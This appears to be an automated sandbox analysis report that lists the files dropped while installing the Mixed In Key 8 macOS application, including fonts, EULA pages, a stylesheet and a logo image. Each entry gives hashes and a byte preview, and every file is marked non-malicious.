SHA-512:	9E157D72206694752D030877B93937355A21444643908B4F766C17EEFCA6AC52C94604ED3FD24C86A63930C4F699350A2A07FDA11208CC77E0D3C46BD78CE97B
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>MIKAboutBoxWidth</key>..<integer>590</integer>..<key>MIKAboutBoxHeight</key>..<integer>490</integer>.</dict>.</plist>.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/eula/.BC.T_No0xpf Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	TIFF image data, big-endian, direntries=20, height=218, bps=0, compression=LZW, PhotometricIntepretation=RGB, description=miklogo@2x.png, orientation=upper-left, width=584
Category:	dropped
Size (bytes):	64346
Entropy (8bit):	7.810290636072915
Encrypted:	false
SSDEEP:	1536:n5VX9mC6Rf3gw5iVqZRz1BEqlXOyFH6UgeIGK:H9t6RfREqZRzD5bFHlguK
MD5:	F4C30F0783040DCA7A07D55E293079BE
SHA1:	79CA6D309F331417B047D881024CD9169A5740A8
SHA-256:	F52EB3E731BACA57E3EC4D239D49BA57C3B607C6D09354AD18F61B50AA0A637D
SHA-512:	1E8644E806787A0E81FF2C94B04914B3D4E3D175930DE92FE79D9D95F5CAA33C55790FF838E810BC1119F969CA20136D71E72831331314FC9E7AEBBE9BB05CAF
Malicious:	false
Preview:	MM.....? @.$....BaP.d6...DbQ8.V-..FcQ..v=..HdR9$.M'.JeR.d.]/.LfS9..m7.NgS......hT:%..G.RiT.e6.O.TjU:.V.W......v._.XlV;%..g.ZmV.`..m.\nW;...w.^oW....o.`pX<&....bqX.f6)..drY<.W-..fsY..C9..htZ=&.M.._..f.]..lv[=..W..nw[...}..O6..'....ry\......tz]>.W....]..w...s...'....z}W.....{...G....y..0V3q...@(...H .q....v.........y.......h....@:.........B.. x...p......e...lh.......p.j............d..........:....&....J....B.\|.. ....B...\|.H(.}.p.............X....9..A0%..4DoE.m....z....a.k...........8........-..t.-..L.Y...L.=Q+..D.X.3={&..mP..G..{.P..f.'..{Op.0..!0#...($.Et..q.+uH...t..1.}..!.N......}[Z...eVJ.4.X.X..T...'_..._...].H&(.X6%..X.Y...8..c.....A8$....R..WNe...tf...x.g..d.g.nn.g..5`...YK. .1U....J...Y..[....y+k..+.....].x.7.l...b...+8..gs...~......V.....2@.-...#...n9..G.....I%.I...T.Y-.K.....i5.M.....y=.O......E.Q...U".M.S..g..p.z.[o.......@.....a.W....~.k...[...a.Z...5..n..wX..3l.\....7...8.V#%v..@.<.33a~./.....z:..h3.....I#...`.$.C....y..o........q...W..K.s....e

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/eula/.BC.T_Oz8Q5f Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	ASCII text
Category:	dropped
Size (bytes):	950
Entropy (8bit):	5.087178611335652
Encrypted:	false
SSDEEP:	24:u4rDZU7Y6nqQRBQ9BVnJbv7zfUcsFZZkE9PckNXvp:u4rDEY6nXQ9vZv7DUT+wP5NXh
MD5:	323150A399821CCA4F26F1D8AD63BE03
SHA1:	03B11B38E248392C11826F5771574F8296C75272
SHA-256:	9B89DEE51261A3421A0A0B982BC3BD93EF830BDE8741248251F40AF5CBF04904
SHA-512:	589F3A96E22FF28557EC295FDF1D85F92F7EF06DEFDE272DCB9CC246BF053AA88CD5E0E1F5325C42F8ED83875AF96907BEA7229FC2784197596268EFC5751D2D
Malicious:	false
Preview:	/.Style sheet for the EULA and Privacy Policy pages./.body {..position:relative;..margin:0;..padding:15px 30px;..font:10pt Verdana, Helvetica, sans-serif;..color:black; background:white;.}..img.logo {..float:right; height:75px;..margin:0 0 0.5em 0.3em;..padding:13px;.}..h1 {..height:38px;..margin:0 auto 20px auto;..border-bottom:3px solid #2be;..padding-top:13px;..font:32px Helvetica, sans-serif;..color:#222; background:transparent;.}..h2 {..margin:1.9em auto 0.4em auto;..font:bold 1.2em Helvetica, sans-serif;.}..p {.margin:0.2em 0 0.6em 0; }..ol { padding:10px 35px;.}..li { padding-top:5px; }..div.box {..width: 40%;..margin: 50pt auto auto auto;..border: 1px solid #ddd;..border-radius: 4px;..color: black;..background: #eee;..text-align: center;..padding: 10px;.}..#footer {..margin-top:0.75cm;..border:1px solid #ddd;..padding:0.4em;..text-align:center;..font:0.9em Verdana, Helvetica, sans-serif;..color:#777; background:transparent;.}.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/eula/.BC.T_QSX9s3 Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	888
Entropy (8bit):	5.146333270847403
Encrypted:	false
SSDEEP:	24:WCuwMpcJHGgwNYNYhoI0HRs0OsqnGR0ZVLVRof:GTpcbwNUYhXGZqnF3C
MD5:	E546AE7E8A4C2836A1152A16DC1F45A2
SHA1:	ECE21CF32B45EDDA8F873CE3F2FC8957EC4603E7
SHA-256:	30DCF79F6D7AEA60B151BF404B75AA42A0116D53762D3EDACB622C275B33BCA8
SHA-512:	56CEA575185EDD38C10460B4F27BB0026127FE6FA04C4970CD7E93253B8E1A4958229167EF5B523002A8615B4BB723D2E1E74BDA2ADE91C5048132FD42E5EFF3
Malicious:	false
Preview:	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN".."http://www.w3.org/TR/html4/strict.dtd">.<html>.<head>..<meta http-equiv="Content-type" content="text/html; charset=utf-8">..<title>Platinum Notes End User Agreement</title>..<link rel="stylesheet" type="text/css" href="style.css" media="all">.</head>.<body>..<div><img class="logo" src="./miklogo.tiff" alt="Mixed In Key logo"></div>..<h1>Mixed In Key</h1>..<h2>Privacy Policy</h2>..<p>To function correctly Mixed In Key needs to collect some user data. Protecting your privacy and your personal data is very important to us.</p>..<p>Before clicking 'Accept' below, please read and review our Privacy Policy carefully to understand which data we collect, and why.</p>....<div class="box">Read our <a href="https://mixedinkey.com/privacy-policy/" title="Opens in your default web browser">Privacy Policy</a> online</div>.</body>.</html>.

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/eula/.BC.T_gQ4EHZ Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	2594
Entropy (8bit):	5.331406449432421
Encrypted:	false
SSDEEP:	48:GTpcbwguQPWgJNjUeniMNDlNtAwSeXLSOd/LEb1hQHcs5Idc3omFJT7:luQPWQ7niMmeXLSOdTE3QHToQ7
MD5:	0CBCB2343FDE35949D10D0B44FF67889
SHA1:	CE4827F7203803DF1FFE03642511535B595E0060
SHA-256:	912CAFC539AE1AFA5B6BCB3D1C3A5991BB756CB9756F9C775739212BCFA5CBBA
SHA-512:	51EBBBDC025549D38F7FB69CF208B6FF027C4E01B6F2C0D7CFADB975680450A0CF8E10F88C0688A9A4DD26080250A9589C57C4C3C569C4C652B2FEE7AF1EDE25
Malicious:	false
Preview:	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN".."http://www.w3.org/TR/html4/strict.dtd">.<html>.<head>..<meta http-equiv="Content-type" content="text/html; charset=utf-8">..<title>Platinum Notes End User Agreement</title>..<link rel="stylesheet" type="text/css" href="style.css" media="all">..<style type="text/css" media="print">...body { width:100%; min-width:0; padding:0; font:11pt Times, serif; }...a { color:inherit; text-decoration:inherit; }..</style>..<script type="text/javascript" charset="utf-8">...function setAllInfo() {....document.getElementById('year').innerHTML = new Date().getFullYear();...}..</script>.</head>.<body onload="setAllInfo();">..<div><img class="logo" src="./miklogo.tiff" alt="Mixed In Key logo"></div>..<h1>Mixed In Key</h1>..<h2>End User License Agreement - EULA</h2>..<p>These Terms and Conditions govern your use of MIXED IN KEY software and your relationship with Mixed In Key LLC. Please read them carefully as they affect your rights and liabilities under

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/fonts/.BC.T_1N2tbP Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	TrueType Font data, 18 tables, 1st "GDEF", 28 names, Macintosh, Copyright 2011 Google Inc. All Rights Reserved.Roboto BlackRegularVersion 2.137; 2017Roboto-Bla
Category:	dropped
Size (bytes):	171480
Entropy (8bit):	6.455991502607069
Encrypted:	false
SSDEEP:	3072:ucKzytD1zjYz01Og87sw7Comqu/xccsqkobOi33XNFRS3eCk1XqmSMOoDRuQKSgW:ucCytD1zjYz01Yh7yqu/mcsFobOi33np
MD5:	EC4C9962BA54EB91787AA93D361C10A8
SHA1:	C572416B9587C40D49EA60C7128F7F17B9317AD8
SHA-256:	3872E9B39760A1B59AC1E192633DBB3B58E595B4D423930AC7DED525E9AE25E0
SHA-512:	D55B1623E9F1A1222CC9D80F70F69287D3F94720566588788189D335FBDBCE8EDAF73513FBCA636E74E3EF4C61DA9EA12046AB6EC518B126BAB623B44F199E1D
Malicious:	false
Preview:	........... GDEF.B.... ....bGPOS.nK...#...e.GSUB..Y...H....OS/2.v.........`cmap.wX....X...Fcvt ...=..0....Zfpgm..#...-.....gasp...... .....glyfV.....;.....hdmx.......@....head...R...,...6hhea.].....d...$hmtx^.........8loca.nA...0.....maxp.>......... nameNQG....(...`post.m.d.. .... prep...C../\...8......#.Rg3i_.<...................R..<.....s.................l.......<.)...............................O.................................3.......3.....f..................P. [... ....GOOG.@.........f.... ........:... . .....d.................5.g...........S...Z.d.8.<.+...x...(.....F.-.(.+.....k.u.......U.......;.../...;...P...S...4...T...O.g.v.N.D...........o.....*.;.s...).n.@.E.,.n.z.n.`.n.t.R...n.j.....$...n.V.n...n...n...E.5.n...H.8.n...@...$.Q.i.I.................>.A.l.i...A.....$.......6.?.-...a.(.4...4.[.=.......7...W.3.\.)...`.a.3.p...a...X.~.4...a...4...a...#.......Y."...........%.....B...(.......)...^.g.{...b...g.u.E.T.....w...^..._.H.U.......A.d.}.H.U.)...-.}.N.T...3...)...Z.!.....R

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/fonts/.BC.T_9KYgzf Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	TrueType Font data, 18 tables, 1st "GDEF", 28 names, Macintosh, Copyright 2011 Google Inc. All Rights Reserved.Roboto MediumRegularVersion 2.137; 2017Roboto-Me
Category:	dropped
Size (bytes):	172064
Entropy (8bit):	6.474449197018235
Encrypted:	false
SSDEEP:	3072:2zC+qmtn5wkex8r6Qym7KCkygAKuXylCC9ptSUXl8j/6afWUemhASD/JwXI:2825wklN7T3QtSUXzqefSTyXI
MD5:	D08840599E05DB7345652D3D417574A9
SHA1:	5F16F4D6DBB4A4F12D8AE96488AC209BB49762A5
SHA-256:	F205CC511821EA56078A105557FCEA6253129404D411C997E1866FBD006ABB68
SHA-512:	1610097AC5709EDBE56A05E6B337769DCB338BB4417693717B5A5E157E824E25E0AF4EDA1C297F35553DF05754D9785136FA230AB1CAFABFC44DA63C7547715B
Malicious:	false
Preview:	........... GDEF.B...."....bGPOS.nK...%`..e.GSUB..Y........OS/2.........`cmap.wX....X...Fcvt 1..K..0....\fpgm..$...-.....gasp......".....glyf/.....;,...<hdmxd.t....@....head...r...,...6hhea.......d...$hmtx..M........8loca..n...1.....maxp.>......... name.-.....h...hpost.m.d..".... prep...)../\...S......#...$6_.<...................R..$...\.s.................l.....k.$.A.\.............................N...............0.................3.......3.....f..................P. [... ....GOOG.@.........f.... ........:... . .....d.................%.....e...`...d...c...V.Z.R.......(.....u.D.......G.<........i.......Q...O...4.......u...E...h...]...........?.z........<.(.[.S.......9.f.:.......e...r.j.....B...q.-.....T.............f.......`.......J...-.7.}.-.....0...).......P.1...X...1...k.5.......1.T.Z...\|.0.O...O.K.S...-...R.q.y...}.....-.}.......\|.s.y...O...\|...O...\|.!.K.....r.w.......!...........R...8.........Q.u.....}.d...^...].@.........Z...].D.W.......W.m...D.W.........J._...<...7...p.......E

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/fonts/.BC.T_GuNU5P Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	TrueType Font data, 18 tables, 1st "GDEF", 28 names, Macintosh, Copyright 2011 Google Inc. All Rights Reserved.Roboto LightRegularVersion 2.137; 2017Roboto-Lig
Category:	dropped
Size (bytes):	170420
Entropy (8bit):	6.484124799440601
Encrypted:	false
SSDEEP:	3072:T/hzuXlLgbEmk0/Dv6QKwRr4T2EUtxq2FquPtQ17uNOIOU7og2FnI:hIqXpSIE6Ey/Q1cWUMxFnI
MD5:	FC84E998BC29B297EA20321E4C90B6ED
SHA1:	73A2BB2D6E591A90FFB4ED118A3989FB17B54C7B
SHA-256:	A6D343D425BC38DB90152FA06058B1C7391ECA9264F334EF65C1CE175085C6F6
SHA-512:	B4CA0BD4D54CE7C896F7BBE931B45347CA7BF6DA10EC1A4DAC9479E5A98573DB531FE96CEDC7A4B67371CC600A587FD508FA4ACDB08233AEBEA89D8EF7AE9769
Malicious:	false
Preview:	........... GDEF.B....#....bGPOS......&X..].GSUB..Y...$....OS/2...........`cmap.wX....X...Fcvt /.....0....Xfpgm.."...-.....gasp......#.....glyf......;....VhdmxG`Rp...@....head.Y.i...,...6hhea.......d...$hmtxU.?.......8loca...t..0.....maxp.>.\....... namegYaG...h...`post.m.d..#.... prepz/.W../\...:......#.8R.o_.<...................R.. .....s.................l.....7. .E...............................Y...............r.......o.,.......3.......3.....f..................P. [... ....GOOG.@.........f.... ........:... . .....d.....................L.....U.o.s...m...l.\.w.......!.e.....K...<.J.1.....-...o.x.o...o.i.o.b.o.C.o...o...o.M.o.j.o.e.......<...M.m...%.\|...T.N.q.........2...=...........x.......!...g.G.....7...........j.}.....j.y.......X...4.B.......,.=...7.......Z.....'.0.....T.M.t...I.g.I.d.o.....^.r.l.".Z...?.p.l.d.......................e...{.Z.o...v.l.......e.....e.....&...?...0... ...W...D.........z.......[.w...]...m. .........f.q...e.k.......{.].\|.j.f.j.......=.T...L...G.@.\|.t.....S

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/fonts/.BC.T_LzwW9f Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	TrueType Font data, 18 tables, 1st "GDEF", 28 names, Macintosh, Copyright 2011 Google Inc. All Rights Reserved.Roboto MediumItalicRoboto Medium ItalicVersion 2
Category:	dropped
Size (bytes):	176864
Entropy (8bit):	6.479365592674514
Encrypted:	false
SSDEEP:	3072:oxzCq887Q/lat81psQ7coxhFT5vs42tvbQlybGwGzvh4PYCJhASD/JwXI:o9/bKIMcsUNvbkyFYCQSTyXI
MD5:	BD19AD60600A1537C00D3B4923A5E5DE
SHA1:	CAB617ECCF6DB0396675EC9C42E747A4738F059F
SHA-256:	F177EED10D2470D13EC68D04907A582829D0EE8281F8A02A906F6954C7816E58
SHA-512:	6CC380C4D736F974009F8F05D25E9813A89F296D32B9BC74F7109336B7C81E76216C34178D41F9AF2C9D845843D91AD749CF33F40DFB6ED70AFE4601F411CEE1
Malicious:	false
Preview:	........... GDEF.B....5....bGPOS.nK...8 ..e.GSUB..Y...P....OS/2..d.......`cmap.wX....X...Fcvt 1..M..0....\fpgm..$...-.....gasp......5.....glyfc.<G..;0....hdmxOshu...@....head...v...,...6hhea.......d...$hmtxu.........8loca..+...1.....maxp.>......... name.1\|7..0.....post.a.d..5.... prep9..../\...X......#.d.9L_.<...................R..A...x.s.................l.....7.A.b.x.............................V...............8.................3.......3.....f..................P. [... ....GOOG...........f.... ........:... . .....d...................7.......;.s.B.......-.Z.....h.....x.g.].=.......6.5.0.....s.`.s...s...s.&.s...s.Z.s.c.s...s.;.s.....+.......2.b.b.../.......2.4.....'...e...'.m.'.M.'.R.k...'.;.5.Y.....'.=.'...'...'.f.k...'.f.d...'...$.......[........................H....z.[.D...y.....=.".h.....8.k.;.4.;..._.p...Y.......................[...u.9.h...r.;...........;.Z.J...d...w...............0... .....2.[.....e.L.....\|...).2.........t.....^.......I.U.....^.........3.....V...g...........}

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/fonts/.BC.T_T7LfAr Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	TrueType Font data, 18 tables, 1st "GDEF", 28 names, Macintosh, Copyright 2011 Google Inc. All Rights Reserved.Roboto BlackItalicRoboto Black ItalicVersion 2.1
Category:	dropped
Size (bytes):	177552
Entropy (8bit):	6.469870038378307
Encrypted:	false
SSDEEP:	3072:UGz6zgv09uYPUi00NM8X17n2RDLvAMMxFo78qFgYVCYw1YCBx8fPmrZL14YZd5ib:x6cvwu3i007zefvAMMxFo7vFVrw1J78T
MD5:	50705C5ED1205B63EFDBFEE941A6B655
SHA1:	6C8ACC36BBDF17BCD6A33756AA42E2557BB3F805
SHA-256:	013D22A4FB2638ADBA28555EE19366F4585F6DC533B7C332F4931A231497CB22
SHA-512:	5BC34823C8FAC9AB2830B629EB60449DABB9AE8E64E84F898CEAC00CF53C5A10E13875EF5B15C7067B96B9BADC9EED18867E0FF30D0C3F2D3F4961BFDC2D8737
Malicious:	false
Preview:	........... GDEF.B....8l...bGPOS.nK...:...e.GSUB..Y........OS/2.v.........`cmap.wX....X...Fcvt ...=..0....Zfpgm..#...-.....gasp......8`....glyf.....;....xhdmxy......@....head.G.W...,...6hhea.H.....d...$hmtx..#........8loca.A...0.....maxp.>......... name.;....3.....post.a.d..8@... prep...C../\...8......#....=_.<...................R..Y.....s.................l.....u.Y.H...............................T.................................3.......3.....f..................P. [... ....GOOG...........f.... ........:... . .....d.......................Q.......4.....E...=.a...^.......c./. .!.......b.$...`...K...................+...A...^...(...{._.%.F.........D.......t.....S.......".H.....b...H...T.O.~...a...f.......?.......}...f.J.....f.M.............2.J.*...................:...Y...:.x...1.w.l.....(...h.......g. .D.%...6.....k...,..."...H...,.......j...f...h...f.!...........6.j.,...R...l...........................E._.....J.....U...=...............".\.w...../.L.~.".\.........7.....M...Z............

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/fonts/.BC.T_YimtvX Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	TrueType Font data, 18 tables, 1st "GDEF", 26 names, Macintosh, Copyright 2011 Google Inc. All Rights Reserved.RobotoBold ItalicRoboto Bold ItalicVersion 2.137
Category:	dropped
Size (bytes):	174952
Entropy (8bit):	6.4597396022196705
Encrypted:	false
SSDEEP:	3072:XzC9IgZjU+O14f107sBZsOX86LjoqEUZsSSSa+m+b0gWOuLPiFhASD/JwXI:jC/djHsx5Mw+m+ogKPi0STyXI
MD5:	1EB7A893589DDCE89D81CDB22A356660
SHA1:	8CD79E47ED8A9F9EA79FFA186852AD7CBAD5687F
SHA-256:	A4BCAC14F419A97DE0917198A4BC51C3ED4FC4A3DB9F68A5102F23664EE01354
SHA-512:	F43EBBF375623DFBE10AFAC3C19E432BBA2B669BF9390F1E4D167F9147CD027A2D434A42EA3E4B7DB108F84E3FBB9FE5AB619DA609AFFC1B425623789A2F7918
Malicious:	false
Preview:	........... GDEF.B.....D...bGPOS.nK...0...e.GSUB..Y........OS/2...........`cmap.wX....X...Fcvt ..,o..0....Jfpgmc.....-.....gasp.......8....glyf..F..:....hdmx_zn....@....head...`...,...6hhea.......d...$hmtx.[_........8loca3.....0.....maxp.>......... name.+M...)....qpost.a.d....... prep9..B../\..........#..).._.<...................R..M.....s.................l.....U.M.U...............................T.................................3.......3.....f..................P. [... ....GOOG.!.........f.... ........:... . .....d.................&.'...y.....~.;....."...K.x...c.......d.F.........Z.K....o.~.V.~...~...~...~...~.C.~.Q.~.q.~.3.~...;.).......$.{.Q...!.........C.........W.....g...J...S.`.....M.(.`.......>...........f.Z.....f.Y.......".....&.T.....................2...P...2.y.n.9...q.....3...h.....+.i...<.0...J.x...b.........../...........c...m.,.h...l.............8.b.;...\...s...............'...........P.;.....K.....i...3............... .].\|.....<.Q... .].........5.....Q...`............

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/fonts/.BC.T_cxq5As Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	Material I
Category:	dropped
Size (bytes):	128180
Entropy (8bit):	5.923497321976906
Encrypted:	false
SSDEEP:	3072:ac3JgwiEle0epMYEZpzha3lEa4rS+hd/R7:ac3Q0zwVEPhD
MD5:	A37B0C01C0BAF1888CA812CC0508F6E2
SHA1:	FC05DE31234E0090F7DDC28CE1B23AF4026CB1DA
SHA-256:	B7F4A3AB562048F28DD1FA691601BC43363A61D0F876D16D8316C52E4F32D696
SHA-512:	CD8784A162ED428CA5A76E5E877349D50620773E3A3D202D5199FEFB5D69A9B87B92C5DE9455DC3C373FEFB065F06A18F17199A5601887FC1F880D14BD223769
Malicious:	false
Preview:	...........pGDEF...S.......$GPOS......,...6GSUB..Q...d..iPOS/2.s"c...x...`cmap..1....x....cvt ...D...\|....gasp............glyfD}........rHhead..f.......6hhea.......4...$hmtxj.iF........loca;)..........maxp.'.....X... name..5....d...zpost...2....... ........O."._.<....................................................................................................@.................L.f...G.L.f...........................................0........................... .+.......................................................................................+.+...@.+.@.@.U.@.U.5.+.@.@.U.k.k.@.+.+.+.+...+...+.+...+.+.+.+.@.+...@.@.U.U.....+...+.+.+.@.+.k...@.@.+.@."...U.U.U.U.U.U.....+.+.+.U.....+.+.....,.@.+.........+.@...+.@...U.w.@.k.U.+.@.+.+.@.U.+.+.k.@.@.+.k.+.+.+.3.@.+.......[...k...k.+.+.....@.U.+.>.....+.....@.U.k.@.+.+.@...+.k.+.+.@.@.+.@.k.U.=.@.+.+.+.!.k.+.+.@...@.@.@.+.@.k.+.+.@.@.+...+.+.+.+.+.+.+.+...........k.@.U.@.........+.U...............@.+...+.+.@...k.....U...+.+.3.+....

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/fonts/.BC.T_dCYuLS Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	TrueType Font data, 18 tables, 1st "GDEF", 28 names, Macintosh, Copyright 2011 Google Inc. All Rights Reserved.Roboto ThinItalicRoboto Thin ItalicVersion 2.137
Category:	dropped
Size (bytes):	176300
Entropy (8bit):	6.492925082087355
Encrypted:	false
SSDEEP:	3072:EKzoDxPLJllUxyf3JM0SVK24NWg6+aHhQIRTkC5EmQJRDDcc4VG0uyONQqjognzt:ECoVTRF2VKy+aCLH8GuVqkIzTx
MD5:	0FC25386220A58203994CE45FB4AE570
SHA1:	C9297D2166618DA2B66A06BACFCBD50B68581E6F
SHA-256:	F5E89A344894A60F0F98F1C0182BA51F5046E29DDE3118820D39025445AEAAE8
SHA-512:	50D910E4FA2855EB58C02F4EC3D9A381903509C26240C01A0E9B29CB31FA78BEBC01DAF0A978D78362FA2DDB93B982BFA2F5439C6A1ACF2A32337623BE78AA03
Malicious:	false
Preview:	........... GDEF.L....:....bGPOS......=H..].GSUB...........OS/2..'.......`cmap.wX....X...Fcvt .2....0@...Hfpgm_.....-.....gasp......:.....glyfU.'...:....dhdmx.)%/...@....head.\|....,...6hhea.}.e...d...$hmtx..&Q.......8locai....0.....maxp.>......... name......6.....post.a.d..:.... prep+6.../\..........#..qsA_.<...................R..>.....s.................l.......>.W...............................W.......................D.........3.......3.....f..................P. [... ....GOOG...........f.... ........:... . .....d...................+.....I...I.K.......;.T...W.p.f.{.H.z.f.P.~...W.B...+.....I.g.I.$.I.8.I.9.I.-.I...I.].I...I.*.I...k...k.....W.^.s...6.l...?.J.......Y.......Y.u.Y.{.Z.^...}.Z.....M.&...Z...Y...Z...Z.5.w...Z.5.w...V...,.....6......................... .......j.B.n.>.....!.#...I.=...C.I.]...9.\|...K.!.I.?...L.......?...L...5.I.?.O.A.I...I.]...?...-...o.I.r...t...................>...(...d.d.......?.i.f.........1.........y.%.Z.}.q...x.~.6...b.u...............t...x.....I......

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/fonts/.BC.T_fMWw4g Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	TrueType Font data, 18 tables, 1st "GDEF", 28 names, Macintosh, Copyright 2011 Google Inc. All Rights Reserved.Roboto ThinRegularVersion 2.137; 2017Roboto-Thin
Category:	dropped
Size (bytes):	171904
Entropy (8bit):	6.4481811458342895
Encrypted:	false
SSDEEP:	3072:es7zZ4GbnoX/bg3chPOy8Y0akfU8ZwC31atEz1viCjp+6OeQr+jpVQRE/ybuyON9:HHm+Q8wektuw6/lCiynVqkIzTx
MD5:	89E2666C24D37055BCB60E9D2D9F7E35
SHA1:	9514AD7AEE341594F43A33893F0B3D8A6D81F32E
SHA-256:	3D91F7AA69CB7F7064035895C566AC5CB9B2084582D351AF7267BB4E0FBA60F5
SHA-512:	B4738B9DED4B7813F4E85983628128682F44BF7262F0CF1BAED6EB58F0DAD79CC63FA3BC79816213362CFF0EE4DE286E90367ED7AD3C461BA9647C93BAE06EBB
Malicious:	false
Preview:	........... GDEF.L....)....bGPOS......,...].GSUB...........OS/2..{.......`cmap.wX....X...Fcvt .2....0@...Hfpgm_.....-.....gasp......).....glyf."....:....hdmx)E5O...@....head.G.....,...6hhea.......d...$hmtx..........8loca..m...0.....maxp.>......... nameO.....%4...Xpost.m.d..).... prep+6.../\..........#.l..8_.<...................R..$.....s.................l.....&.$.@...............................V.......................Y.........3.......3.....f..................P. [... ....GOOG.@.........f.... ........:... . .....d.........................a.3.a.y...r...s.T..._...o...X.....I...\._.=.......*.a.}.a...a.u.a.g.a.R.a...a...a.M.a.d.a.g.l.x.l.Q...R.v.....r.}.].n.x...!...../...<...........~...........e.Z.....!...........T.......T...<.....`...7.U.....#.?.=...6...!...^.......9.....Q.[.M.......9.\.a.....a.a.z...W...B.c.y.a.........q.........,...a...g.Z.a...a.z.......l...&.a.....+...S...7...+...W...I.................V...~._...r...!.......s.......{.........M.z...s.+.......5.H...V...P...~.a.....c

/private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/C4D9EA0D-14AA-4D29-838E-1D6070C50BA9.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Resources/fonts/.BC.T_ihC20x Download File
Process:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
File Type:	TrueType Font data, 18 tables, 1st "GDEF", 28 names, Macintosh, Copyright 2011 Google Inc. All Rights Reserved.Roboto LightItalicRoboto Light ItalicVersion 2.1
Category:	dropped
Size (bytes):	176616
Entropy (8bit):	6.49166757683843
Encrypted:	false
SSDEEP:	3072:vIRJ97szv8slhg2mSacwEH6c96KpVDWH1/XH15O8IdcNuHWjUsM1mCUMESkPIsOW:G9Qv8gm5M6mDAaq4paWUMxFnI
MD5:	D1EFCD4D126837FE0DCF9B6CF3A00D64
SHA1:	037EF2BF307642203858DD252FC46EB400684F02
SHA-256:	364A23E13C64937C3FCEA3DB778628B89379C893849BBADE6E5BF83C5F605C6A
SHA-512:	ED6EFBAD5D0806AB08EEF4E87C64FE57E8885B84C56ADEB2A1F0A600F00AD90179A27A5331E4A86C0F011E34D06377712BD6B341D476CD84BD1235D8C49307DE
Malicious:	false
